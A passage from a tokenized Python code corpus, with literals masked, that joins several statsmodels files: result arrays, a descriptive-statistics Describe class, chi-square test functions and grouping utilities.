<EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , np . 
nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> ] ) . reshape ( <NUM_LIT> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . 
array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> 
, <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) . reshape ( <NUM_LIT> , <NUM_LIT> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> results_onestep = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> ** est <EOL> ) </s>
<s> '''<STR_LIT>''' <EOL> from . tools_pca import * </s>
<s> from statsmodels . compat . python import lrange , lmap , iterkeys , iteritems <EOL> import numpy as np <EOL> from scipy import stats <EOL> from statsmodels . iolib . table import SimpleTable <EOL> from statsmodels . tools . decorators import nottest <EOL> def _kurtosis ( a ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> res = stats . kurtosis ( a ) <EOL> except ValueError : <EOL> res = np . nan <EOL> return res <EOL> def _skew ( a ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> res = stats . skew ( a ) <EOL> except ValueError : <EOL> res = np . nan <EOL> return res <EOL> _sign_test_doc = '''<STR_LIT>''' <EOL> @ nottest <EOL> def sign_test ( samp , mu0 = <NUM_LIT:0> ) : <EOL> samp = np . asarray ( samp ) <EOL> pos = np . sum ( samp > mu0 ) <EOL> neg = np . sum ( samp < mu0 ) <EOL> M = ( pos - neg ) / <NUM_LIT> <EOL> p = stats . binom_test ( min ( pos , neg ) , pos + neg , <NUM_LIT> ) <EOL> return M , p <EOL> sign_test . __doc__ = _sign_test_doc <EOL> class Describe ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , dataset ) : <EOL> self . dataset = dataset <EOL> self . univariate = dict ( <EOL> obs = [ len , None , None ] , <EOL> mean = [ np . mean , None , None ] , <EOL> std = [ np . std , None , None ] , <EOL> min = [ np . min , None , None ] , <EOL> max = [ np . max , None , None ] , <EOL> ptp = [ np . ptp , None , None ] , <EOL> var = [ np . var , None , None ] , <EOL> mode_val = [ self . _mode_val , None , None ] , <EOL> mode_bin = [ self . _mode_bin , None , None ] , <EOL> median = [ np . median , None , None ] , <EOL> skew = [ stats . skew , None , None ] , <EOL> uss = [ lambda x : np . sum ( np . asarray ( x ) ** <NUM_LIT:2> , axis = <NUM_LIT:0> ) , None , None ] , <EOL> kurtosis = [ stats . kurtosis , None , None ] , <EOL> percentiles = [ self . _percentiles , None , None ] , <EOL> ) <EOL> self . _arraytype = None <EOL> self . _columns_list = None <EOL> def _percentiles ( self , x ) : <EOL> p = [ stats . 
scoreatpercentile ( x , per ) for per in <EOL> ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> return p <EOL> def _mode_val ( self , x ) : <EOL> return stats . mode ( x ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> def _mode_bin ( self , x ) : <EOL> return stats . mode ( x ) [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> def _array_typer ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . dataset . dtype . names ) : <EOL> """<STR_LIT>""" <EOL> self . _arraytype = '<STR_LIT>' <EOL> elif self . dataset . dtype . names : <EOL> """<STR_LIT>""" <EOL> self . _arraytype = '<STR_LIT>' <EOL> else : <EOL> assert self . _arraytype == '<STR_LIT>' or self . _arraytype == '<STR_LIT>' <EOL> def _is_dtype_like ( self , col ) : <EOL> """<STR_LIT>""" <EOL> def string_like ( ) : <EOL> try : <EOL> self . dataset [ col ] [ <NUM_LIT:0> ] + '<STR_LIT>' <EOL> except ( TypeError , ValueError ) : <EOL> return False <EOL> return True <EOL> def number_like ( ) : <EOL> try : <EOL> self . dataset [ col ] [ <NUM_LIT:0> ] + <NUM_LIT:1.0> <EOL> except ( TypeError , ValueError ) : <EOL> return False <EOL> return True <EOL> if number_like ( ) == True and string_like ( ) == False : <EOL> return '<STR_LIT>' <EOL> elif number_like ( ) == False and string_like ( ) == True : <EOL> return '<STR_LIT:string>' <EOL> else : <EOL> assert ( number_like ( ) == True or string_like ( ) == True ) , '<STR_LIT>' + str ( self . dataset [ col ] [ <NUM_LIT:0> ] ) <EOL> def summary ( self , stats = '<STR_LIT>' , columns = '<STR_LIT:all>' , orientation = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . _arraytype == None : <EOL> self . 
_array_typer ( ) <EOL> if stats == '<STR_LIT>' : <EOL> stats = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif stats == '<STR_LIT:all>' : <EOL> stats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> for astat in stats : <EOL> pass <EOL> import scipy . stats <EOL> def _fun ( per ) : <EOL> return lambda x : scipy . stats . scoreatpercentile ( x , per ) <EOL> perdict = dict ( ( '<STR_LIT>' % per , [ _fun ( per ) , None , None ] ) <EOL> for per in ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> if '<STR_LIT>' in stats : <EOL> self . univariate . update ( perdict ) <EOL> idx = stats . index ( '<STR_LIT>' ) <EOL> stats [ idx : idx + <NUM_LIT:1> ] = sorted ( iterkeys ( perdict ) ) <EOL> if any ( [ aitem [ <NUM_LIT:1> ] for aitem in iteritems ( self . univariate ) if aitem [ <NUM_LIT:0> ] in <EOL> stats ] ) : <EOL> if columns == '<STR_LIT:all>' : <EOL> self . _columns_list = [ ] <EOL> if self . _arraytype == '<STR_LIT>' : <EOL> self . _columns_list = self . dataset . dtype . names <EOL> else : <EOL> self . _columns_list = lrange ( self . dataset . shape [ <NUM_LIT:1> ] ) <EOL> else : <EOL> self . _columns_list = columns <EOL> if self . _arraytype == '<STR_LIT>' : <EOL> for col in self . _columns_list : <EOL> assert ( col in self . dataset . dtype . names ) <EOL> else : <EOL> assert self . _is_dtype_like ( self . dataset ) == '<STR_LIT>' <EOL> columstypes = self . dataset . dtype <EOL> for astat in stats : <EOL> calc = self . univariate [ astat ] <EOL> if self . _arraytype == '<STR_LIT>' : <EOL> calc [ <NUM_LIT:1> ] = self . _columns_list <EOL> calc [ <NUM_LIT:2> ] = [ calc [ <NUM_LIT:0> ] ( self . dataset [ col ] ) for col in <EOL> self . _columns_list if ( self . 
_is_dtype_like ( col ) == <EOL> '<STR_LIT>' ) ] <EOL> else : <EOL> calc [ <NUM_LIT:1> ] = [ '<STR_LIT>' + str ( col ) for col in self . _columns_list ] <EOL> calc [ <NUM_LIT:2> ] = [ calc [ <NUM_LIT:0> ] ( self . dataset [ : , col ] ) for col in <EOL> self . _columns_list ] <EOL> return self . print_summary ( stats , orientation = orientation ) <EOL> else : <EOL> return self . print_summary ( stats , orientation = orientation ) <EOL> def print_summary ( self , stats , orientation = '<STR_LIT>' ) : <EOL> title = '<STR_LIT>' <EOL> header = stats <EOL> stubs = self . univariate [ '<STR_LIT>' ] [ <NUM_LIT:1> ] <EOL> data = [ [ self . univariate [ astat ] [ <NUM_LIT:2> ] [ col ] for astat in stats ] for col in <EOL> range ( len ( self . univariate [ '<STR_LIT>' ] [ <NUM_LIT:2> ] ) ) ] <EOL> if ( orientation == '<STR_LIT>' ) or ( orientation == '<STR_LIT>' and len ( stubs ) < len ( header ) ) : <EOL> data = lmap ( lambda * row : list ( row ) , * data ) <EOL> header , stubs = stubs , header <EOL> part_fmt = dict ( data_fmts = [ "<STR_LIT>" ] * ( len ( header ) - <NUM_LIT:1> ) ) <EOL> table = SimpleTable ( data , <EOL> header , <EOL> stubs , <EOL> title = title , <EOL> txt_fmt = part_fmt ) <EOL> return table <EOL> def sign_test ( self , samp , mu0 = <NUM_LIT:0> ) : <EOL> return sign_test ( samp , mu0 ) <EOL> sign_test . __doc__ = _sign_test_doc <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> t1 = Describe ( data4 ) <EOL> noperc = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> print ( t1 . summary ( stats = noperc ) ) <EOL> print ( t1 . summary ( ) ) <EOL> print ( t1 . summary ( orientation = '<STR_LIT>' ) ) <EOL> print ( t1 . summary ( stats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , orientation = ( '<STR_LIT>' ) ) ) <EOL> print ( t1 . summary ( stats = '<STR_LIT:all>' ) ) <EOL> import unittest <EOL> data1 = np . 
array ( [ ( <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> , '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:4> , '<STR_LIT:b>' , '<STR_LIT>' ) ] , <EOL> dtype = [ ( '<STR_LIT>' , float ) , ( '<STR_LIT>' , int ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> data2 = np . array ( [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:4> ) ] , <EOL> dtype = [ ( '<STR_LIT>' , float ) , ( '<STR_LIT>' , float ) ] ) <EOL> data3 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:3> ] ] , dtype = float ) <EOL> data4 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> ] ] ) <EOL> class TestSimpleTable ( unittest . TestCase ) : <EOL> def test_basic_1 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data1 ) <EOL> print ( t1 . summary ( ) ) <EOL> def test_basic_2 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t2 = Describe ( data2 ) <EOL> print ( t2 . summary ( ) ) <EOL> def test_basic_3 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data3 ) <EOL> print ( t1 . summary ( ) ) <EOL> def test_basic_4 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data4 ) <EOL> print ( t1 . summary ( ) ) <EOL> def test_basic_1a ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data1 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT>' , columns = [ '<STR_LIT>' ] ) ) <EOL> def test_basic_1b ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data1 ) <EOL> print ( t1 . 
summary ( stats = '<STR_LIT>' , columns = '<STR_LIT:all>' ) ) <EOL> def test_basic_2a ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t2 = Describe ( data2 ) <EOL> print ( t2 . summary ( stats = '<STR_LIT:all>' ) ) <EOL> def test_basic_3 ( aself ) : <EOL> t1 = Describe ( data3 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT:all>' ) ) <EOL> def test_basic_4a ( self ) : <EOL> t1 = Describe ( data4 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT:all>' ) ) </s>
<s> """<STR_LIT>""" <EOL> from statsmodels . compat . python import itervalues <EOL> import numpy as np <EOL> from numpy . testing import assert_almost_equal , assert_equal <EOL> from statsmodels . stats . gof import ( chisquare , chisquare_power , <EOL> chisquare_effectsize ) <EOL> class Holder ( object ) : <EOL> pass <EOL> def test_chisquare_power ( ) : <EOL> from . results . results_power import pwr_chisquare <EOL> for case in itervalues ( pwr_chisquare ) : <EOL> power = chisquare_power ( case . w , case . N , case . df + <NUM_LIT:1> , <EOL> alpha = case . sig_level ) <EOL> assert_almost_equal ( power , case . power , decimal = <NUM_LIT:6> , <EOL> err_msg = repr ( vars ( case ) ) ) <EOL> def test_chisquare ( ) : <EOL> res1 = Holder ( ) <EOL> res2 = Holder ( ) <EOL> res1 . statistic = <NUM_LIT> <EOL> res1 . parameter = <NUM_LIT:4> <EOL> res1 . p_value = <NUM_LIT> <EOL> res1 . method = '<STR_LIT>' <EOL> res1 . data_name = '<STR_LIT>' <EOL> res1 . observed = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res1 . expected = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res1 . residuals = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res2 . statistic = <NUM_LIT> <EOL> res2 . parameter = <NUM_LIT:4> <EOL> res2 . p_value = <NUM_LIT> <EOL> res2 . method = '<STR_LIT>' <EOL> res2 . data_name = '<STR_LIT>' <EOL> res2 . observed = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res2 . expected = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res2 . residuals = np . array ( [ <EOL> - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> freq = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pr1 = np . 
array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pr2 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> for pr , res in zip ( [ pr1 , pr2 ] , [ res1 , res2 ] ) : <EOL> stat , pval = chisquare ( freq , pr ) <EOL> assert_almost_equal ( stat , res . statistic , decimal = <NUM_LIT:12> ) <EOL> assert_almost_equal ( pval , res . p_value , decimal = <NUM_LIT> ) <EOL> def test_chisquare_effectsize ( ) : <EOL> pr1 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pr2 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> es_r = <NUM_LIT> <EOL> es1 = chisquare_effectsize ( pr1 , pr2 ) <EOL> es2 = chisquare_effectsize ( pr1 , pr2 , cohen = False ) <EOL> assert_almost_equal ( es1 , es_r , decimal = <NUM_LIT> ) <EOL> assert_almost_equal ( es2 , es_r ** <NUM_LIT:2> , decimal = <NUM_LIT> ) <EOL> res1 = chisquare_effectsize ( pr1 , pr2 , cohen = False , <EOL> correction = ( <NUM_LIT> , len ( pr1 ) - <NUM_LIT:1> ) ) <EOL> res0 = <NUM_LIT:0> <EOL> assert_equal ( res1 , res0 ) <EOL> pr3 = pr2 + [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:50> , <NUM_LIT:50> ] <EOL> res1 = chisquare_effectsize ( pr1 , pr3 , cohen = False , <EOL> correction = ( <NUM_LIT> , len ( pr1 ) - <NUM_LIT:1> ) ) <EOL> res0 = <NUM_LIT> <EOL> assert_almost_equal ( res1 , res0 , decimal = <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from statsmodels . compat . python import lrange , lzip , range <EOL> import numpy as np <EOL> import pandas as pd <EOL> from statsmodels . compat . numpy import npc_unique <EOL> import statsmodels . tools . data as data_util <EOL> from pandas . core . index import Index , MultiIndex <EOL> def combine_indices ( groups , prefix = '<STR_LIT>' , sep = '<STR_LIT:.>' , return_labels = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( groups , tuple ) : <EOL> groups = np . column_stack ( groups ) <EOL> else : <EOL> groups = np . asarray ( groups ) <EOL> dt = groups . dtype <EOL> is2d = ( groups . ndim == <NUM_LIT:2> ) <EOL> if is2d : <EOL> ncols = groups . shape [ <NUM_LIT:1> ] <EOL> if not groups . flags . c_contiguous : <EOL> groups = np . array ( groups , order = '<STR_LIT:C>' ) <EOL> groups_ = groups . view ( [ ( '<STR_LIT>' , groups . dtype ) ] * groups . shape [ <NUM_LIT:1> ] ) <EOL> else : <EOL> groups_ = groups <EOL> uni , uni_idx , uni_inv = npc_unique ( groups_ , return_index = True , <EOL> return_inverse = True ) <EOL> if is2d : <EOL> uni = uni . view ( dt ) . reshape ( - <NUM_LIT:1> , ncols ) <EOL> if return_labels : <EOL> label = [ ( prefix + sep . join ( [ '<STR_LIT:%s>' ] * len ( uni [ <NUM_LIT:0> ] ) ) ) % tuple ( ii ) <EOL> for ii in uni ] <EOL> return uni_inv , uni_idx , uni , label <EOL> else : <EOL> return uni_inv , uni_idx , uni <EOL> def group_sums ( x , group , use_bincount = True ) : <EOL> """<STR_LIT>""" <EOL> x = np . asarray ( x ) <EOL> if x . ndim == <NUM_LIT:1> : <EOL> x = x [ : , None ] <EOL> elif x . ndim > <NUM_LIT:2> and use_bincount : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if use_bincount : <EOL> if np . max ( group ) > <NUM_LIT:2> * x . shape [ <NUM_LIT:0> ] : <EOL> group = pd . factorize ( group ) [ <NUM_LIT:0> ] <EOL> return np . array ( [ np . bincount ( group , weights = x [ : , col ] ) <EOL> for col in range ( x . 
shape [ <NUM_LIT:1> ] ) ] ) <EOL> else : <EOL> uniques = np . unique ( group ) <EOL> result = np . zeros ( [ len ( uniques ) ] + list ( x . shape [ <NUM_LIT:1> : ] ) ) <EOL> for ii , cat in enumerate ( uniques ) : <EOL> result [ ii ] = x [ g == cat ] . sum ( <NUM_LIT:0> ) <EOL> return result <EOL> def group_sums_dummy ( x , group_dummy ) : <EOL> """<STR_LIT>""" <EOL> if data_util . _is_using_ndarray_type ( group_dummy , None ) : <EOL> return np . dot ( x . T , group_dummy ) <EOL> else : <EOL> return x . T * group_dummy <EOL> def dummy_sparse ( groups ) : <EOL> """<STR_LIT>""" <EOL> from scipy import sparse <EOL> indptr = np . arange ( len ( groups ) + <NUM_LIT:1> ) <EOL> data = np . ones ( len ( groups ) , dtype = np . int8 ) <EOL> indi = sparse . csr_matrix ( ( data , g , indptr ) ) <EOL> return indi <EOL> class Group ( object ) : <EOL> def __init__ ( self , group , name = '<STR_LIT>' ) : <EOL> self . name = name <EOL> uni , uni_idx , uni_inv = combine_indices ( group ) <EOL> self . group_int , self . uni_idx , self . uni = uni , uni_idx , uni_inv <EOL> self . n_groups = len ( self . uni ) <EOL> self . separator = '<STR_LIT:.>' <EOL> self . prefix = self . name <EOL> if self . prefix : <EOL> self . prefix = self . prefix + '<STR_LIT:=>' <EOL> def counts ( self ) : <EOL> return np . bincount ( self . group_int ) <EOL> def labels ( self ) : <EOL> prefix = self . prefix <EOL> uni = self . uni <EOL> sep = self . separator <EOL> if uni . ndim > <NUM_LIT:1> : <EOL> label = [ ( prefix + sep . join ( [ '<STR_LIT:%s>' ] * len ( uni [ <NUM_LIT:0> ] ) ) ) % tuple ( ii ) <EOL> for ii in uni ] <EOL> else : <EOL> label = [ prefix + '<STR_LIT:%s>' % ii for ii in uni ] <EOL> return label <EOL> def dummy ( self , drop_idx = None , sparse = False , dtype = int ) : <EOL> """<STR_LIT>""" <EOL> uni = self . uni <EOL> if drop_idx is not None : <EOL> idx = lrange ( len ( uni ) ) <EOL> del idx [ drop_idx ] <EOL> uni = uni [ idx ] <EOL> group = self . 
group <EOL> if not sparse : <EOL> return ( group [ : , None ] == uni [ None , : ] ) . astype ( dtype ) <EOL> else : <EOL> return dummy_sparse ( self . group_int ) <EOL> def interaction ( self , other ) : <EOL> if isinstance ( other , self . __class__ ) : <EOL> other = other . group <EOL> return self . __class__ ( ( self , other ) ) <EOL> def group_sums ( self , x , use_bincount = True ) : <EOL> return group_sums ( x , self . group_int , use_bincount = use_bincount ) <EOL> def group_demean ( self , x , use_bincount = True ) : <EOL> nobs = float ( len ( x ) ) <EOL> means_g = group_sums ( x / nobs , self . group_int , <EOL> use_bincount = use_bincount ) <EOL> x_demeaned = x - means_g [ self . group_int ] <EOL> return x_demeaned , means_g <EOL> class GroupSorted ( Group ) : <EOL> def __init__ ( self , group , name = '<STR_LIT>' ) : <EOL> super ( self . __class__ , self ) . __init__ ( group , name = name ) <EOL> idx = ( np . nonzero ( np . diff ( group ) ) [ <NUM_LIT:0> ] + <NUM_LIT:1> ) . tolist ( ) <EOL> self . groupidx = lzip ( [ <NUM_LIT:0> ] + idx , idx + [ len ( group ) ] ) <EOL> def group_iter ( self ) : <EOL> for low , upp in self . groupidx : <EOL> yield slice ( low , upp ) <EOL> def lag_indices ( self , lag ) : <EOL> """<STR_LIT>""" <EOL> lag_idx = np . asarray ( self . groupidx ) [ : , <NUM_LIT:1> ] - lag <EOL> mask_ok = ( lag <= lag_idx ) <EOL> return lag_idx [ mask_ok ] <EOL> def _is_hierarchical ( x ) : <EOL> """<STR_LIT>""" <EOL> item = x [ <NUM_LIT:0> ] <EOL> if isinstance ( item , ( list , tuple , np . ndarray , pd . Series , pd . DataFrame ) ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def _make_hierarchical_index ( index , names ) : <EOL> return MultiIndex . from_tuples ( * [ index ] , names = names ) <EOL> def _make_generic_names ( index ) : <EOL> n_names = len ( index . names ) <EOL> pad = str ( len ( str ( n_names ) ) ) <EOL> return [ ( "<STR_LIT>" + pad + "<STR_LIT:}>" ) . 
format ( i ) for i in range ( n_names ) ] <EOL> class Grouping ( object ) : <EOL> def __init__ ( self , index , names = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( index , ( Index , MultiIndex ) ) : <EOL> if names is not None : <EOL> if hasattr ( index , '<STR_LIT>' ) : <EOL> index . set_names ( names , inplace = True ) <EOL> else : <EOL> index . names = names <EOL> self . index = index <EOL> else : <EOL> if _is_hierarchical ( index ) : <EOL> self . index = _make_hierarchical_index ( index , names ) <EOL> else : <EOL> self . index = Index ( index , name = names ) <EOL> if names is None : <EOL> names = _make_generic_names ( self . index ) <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> self . index . set_names ( names , inplace = True ) <EOL> else : <EOL> self . index . names = names <EOL> self . nobs = len ( self . index ) <EOL> self . nlevels = len ( self . index . names ) <EOL> self . slices 